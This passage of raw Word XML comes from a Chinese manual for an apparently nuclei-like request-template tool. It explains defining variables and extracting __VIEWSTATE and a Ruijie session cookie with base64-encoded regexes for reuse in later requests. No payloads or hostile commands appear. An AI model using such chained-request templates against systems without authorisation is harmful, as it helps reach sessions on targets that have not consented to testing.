      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4389E841" w14:textId="64FC9ED0" w:rsidR="00E97F6B" w:rsidRDefault="00E97F6B" w:rsidP="00E97F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些时候需要使用正则表达式取返回字段中的某些值或者提取JOSN</w:t>
      </w:r>
      <w:r w:rsidR="0029783B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里提供两个函数regex和json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012ED38" w14:textId="77777777" w:rsidR="00DA38A7" w:rsidRDefault="00DA38A7" w:rsidP="00E97F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4405558C" w14:textId="104D37C1" w:rsidR="00DA38A7" w:rsidRPr="00DA38A7" w:rsidRDefault="00DA38A7" w:rsidP="00DA38A7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc171467012"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA38A7">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3FC9066E" w14:textId="4985829D" w:rsidR="00DA38A7" w:rsidRDefault="007E6521" w:rsidP="00E97F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每使用一个高级函数，都要定义一个变量出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BFC60C" w14:textId="078AD2C0" w:rsidR="007E6521" w:rsidRDefault="00AB2C99" w:rsidP="00E97F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如我们在condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2C99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中定义一个变量 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2C99">
        <w:t>VIEWSTATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814F8B1" w14:textId="527E6956" w:rsidR="00AB2C99" w:rsidRDefault="00AB2C99" w:rsidP="00E97F6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69BF184" wp14:editId="281BA2DB">
            <wp:extent cx="5274310" cy="2930525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="4709859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859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9F3B" w14:textId="488B346D" w:rsidR="00AB2C99" w:rsidRDefault="00AB2C99" w:rsidP="00E97F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">那么在request2中就是 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2C99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">{{变量名}} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对变量进行使用，跟nuclei一样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292C50B" w14:textId="78AE9C39" w:rsidR="00AB2C99" w:rsidRDefault="00AB2C99" w:rsidP="00E97F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DAC1EEE" wp14:editId="47E3FC0B">
            <wp:extent cx="5274310" cy="2465705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14946930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9307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0C7D" w14:textId="6813F390" w:rsidR="0029783B" w:rsidRDefault="00DA38A7" w:rsidP="0029783B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc171467013"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="0029783B">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0029783B" w:rsidRPr="0029783B">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>egex 正则表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="04C8D85D" w14:textId="16A74777" w:rsidR="00C56E79" w:rsidRPr="00C56E79" w:rsidRDefault="00C56E79" w:rsidP="00C56E79">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C56E79">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.2.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在body中使用正则表达式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B9CFBE" w14:textId="15AF009D" w:rsidR="00255743" w:rsidRDefault="00255743" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在json中使用正则表达式时会产生格式冲突，突然某一天，我脑子里出现了一种奇妙的想法，将正则表达式使用base64格式编码一下不就可以了？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285D72B" w14:textId="77777777" w:rsidR="00255743" w:rsidRDefault="00255743" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF1BE22" w14:textId="534B60F9" w:rsidR="00255743" w:rsidRDefault="00255743" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DD41FA7" wp14:editId="2B250EE9">
            <wp:extent cx="5274310" cy="1143635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1884666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663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2F4D" w14:textId="77777777" w:rsidR="00C56E79" w:rsidRDefault="00C56E79" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsi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5743" w14:paraId="56BB1F47" w14:textId="77777777" w:rsidTr="00255743">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4100C28A" w14:textId="77777777" w:rsidR="00255743" w:rsidRDefault="00255743" w:rsidP="00255743">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55340F29" w14:textId="77777777" w:rsidR="00255743" w:rsidRDefault="00255743" w:rsidP="00255743">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "regex": "VIEWSTATE:body:PGlucHV0W14+XSpuYW1lPSJfX1ZJRVdTVEFURSJbXj5dKnZhbHVlPSIoW14iXSspIg==",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4936685E" w14:textId="77777777" w:rsidR="00255743" w:rsidRDefault="00255743" w:rsidP="00255743">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70ED329A" w14:textId="474EBB22" w:rsidR="00255743" w:rsidRDefault="00255743" w:rsidP="00255743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3D7BB5B0" w14:textId="17E68F15" w:rsidR="00255743" w:rsidRDefault="00D8523E" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿出来看表达式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F074B" w14:textId="77777777" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0280CDFF" w14:textId="3BBB908C" w:rsidR="008B74F0" w:rsidRPr="008B74F0" w:rsidRDefault="00D8523E" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B74F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>VIEWSTATE</w:t>
      </w:r>
      <w:r w:rsidRPr="008B74F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B74F0">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="008B74F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B74F0">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>PGlucHV0W14+XSpuYW1lPSJfX1ZJRVdTVEFURSJbXj5dKnZhbHVlPSIoW14iXSspIg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B91EF" w14:textId="77777777" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5819FD78" w14:textId="5B2DAE33" w:rsidR="00D8523E" w:rsidRDefault="00D8523E" w:rsidP="00255743">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中分为三个部分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D8523E" w14:paraId="3682487D" w14:textId="77777777" w:rsidTr="00D8523E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38207519" w14:textId="56D3FB6C" w:rsidR="00D8523E" w:rsidRPr="00C56E79" w:rsidRDefault="00D8523E" w:rsidP="00C56E79">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56E79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>VIEWSTATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50390504" w14:textId="46B02B11" w:rsidR="00D8523E" w:rsidRDefault="00D8523E" w:rsidP="00C56E7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定义变量名称，随便起</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8523E" w14:paraId="3295B46C" w14:textId="77777777" w:rsidTr="00D8523E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F23BBAD" w14:textId="3EF832B2" w:rsidR="00D8523E" w:rsidRPr="00C56E79" w:rsidRDefault="00D8523E" w:rsidP="00C56E79">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56E79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58E3B4A3" w14:textId="3EFD3D46" w:rsidR="00D8523E" w:rsidRDefault="00D8523E" w:rsidP="00C56E7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使用正则表达式匹配哪里的值，分为body和header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D8523E" w14:paraId="0189AC39" w14:textId="77777777" w:rsidTr="00D8523E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34375998" w14:textId="414495CD" w:rsidR="00D8523E" w:rsidRPr="00C56E79" w:rsidRDefault="00D8523E" w:rsidP="00C56E79">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56E79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>PGlucHV0W14+XSpuYW1lPSJfX1ZJRVdTVEFURSJbXj5dKnZhbHVlPSIoW14iXSspIg==</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="252F5182" w14:textId="77777777" w:rsidR="00D8523E" w:rsidRDefault="00D8523E" w:rsidP="00C56E79">
            <w:pPr>
              <w:jc w:val="left"/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ase64加密后的正则表达式</w:t>
            </w:r>
            <w:r w:rsidR="00C56E79">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，base64解密后为：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A74E533" w14:textId="7AEEC8B1" w:rsidR="00C56E79" w:rsidRDefault="00C56E79" w:rsidP="00C56E79">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56E79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&lt;input[^&gt;]*name="__VIEWSTATE"[^&gt;]*value="([^"]+)"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FA98EA9" w14:textId="0202DBA2" w:rsidR="00DA38A7" w:rsidRDefault="00DA38A7" w:rsidP="00DA38A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AFE69E" w14:textId="780A9E4B" w:rsidR="00C56E79" w:rsidRDefault="008B74F0" w:rsidP="00C56E79">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B74F0">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C56E79" w:rsidRPr="008B74F0">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在header中使用正则表达式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48925A53" w14:textId="03CD6EC4" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在header中使用，需要指定一个键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F70B0" w14:textId="7C38AAB6" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754A128" w14:textId="2E9B5040" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17627EB2" wp14:editId="5BF507AA">
            <wp:extent cx="5274310" cy="984885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="18013418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34180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74F0" w14:paraId="2FE4E431" w14:textId="77777777" w:rsidTr="008B74F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18CA21BF" w14:textId="77777777" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D7D5FD3" w14:textId="77777777" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "header": "Set-Cookie:_",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DD1E768" w14:textId="77777777" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "regex": "cookie:</w:t>
            </w:r>
            <w:r w:rsidRPr="000201E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>header</w:t>
            </w:r>
            <w:r w:rsidRPr="000201E8">
              <w:rPr>
                <w:color w:val="0E2841" w:themeColor="text2"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="000201E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Set-Cookie</w:t>
            </w:r>
            <w:r>
              <w:t>:UlVJSklFSUQ9KC4qKTsgcGF0aD0v",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A7851B" w14:textId="77777777" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421EBA7B" w14:textId="3DAA2E42" w:rsidR="008B74F0" w:rsidRDefault="008B74F0" w:rsidP="008B74F0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7FAF4E8C" w14:textId="11264190" w:rsidR="008B74F0" w:rsidRDefault="000201E8" w:rsidP="008B74F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中比body多一个值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90"/>
        <w:gridCol w:w="5006"/>
      </w:tblGrid>
      <w:tr w:rsidR="000201E8" w14:paraId="578CF1DF" w14:textId="77777777" w:rsidTr="000201E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C0B7C2A" w14:textId="6CB4E745" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="000201E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FA712E6" w14:textId="49A7B616" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="008B74F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>变量名称，随便写的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000201E8" w14:paraId="05016968" w14:textId="77777777" w:rsidTr="000201E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5527DC91" w14:textId="4FA8B07E" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="000201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eader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7545775F" w14:textId="1A6DF1FD" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="008B74F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表面这次是在header中取值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000201E8" w14:paraId="5EA0B372" w14:textId="77777777" w:rsidTr="000201E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="223571DB" w14:textId="2F640EE6" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="000201E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000201E8">
              <w:rPr>
                <w:color w:val="0E2841" w:themeColor="text2"/>
              </w:rPr>
              <w:t>Set-Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="775DA570" w14:textId="298B0D38" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="008B74F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>指定请求头某个键的值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000201E8" w14:paraId="7A1A7581" w14:textId="77777777" w:rsidTr="000201E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5610FCB2" w14:textId="2495BC9B" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="000201E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>UlVJSklFSUQ9KC4qKTsgcGF0aD0v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64BB2229" w14:textId="074FF043" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="008B74F0">
            <w:pPr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ase64加密后的正则表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42C9F890" w14:textId="77777777" w:rsidR="000201E8" w:rsidRDefault="000201E8" w:rsidP="008B74F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0970A6B1" w14:textId="4CF37966" w:rsidR="0053606E" w:rsidRDefault="0053606E" w:rsidP="0053606E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc171467014"/>
      <w:r w:rsidRPr="0053606E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2.3 JSON</w:t>
      </w:r>
      <w:r w:rsidR="00985C7E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053606E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidR="00C87C36">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="0053606E">
        <w:rPr>
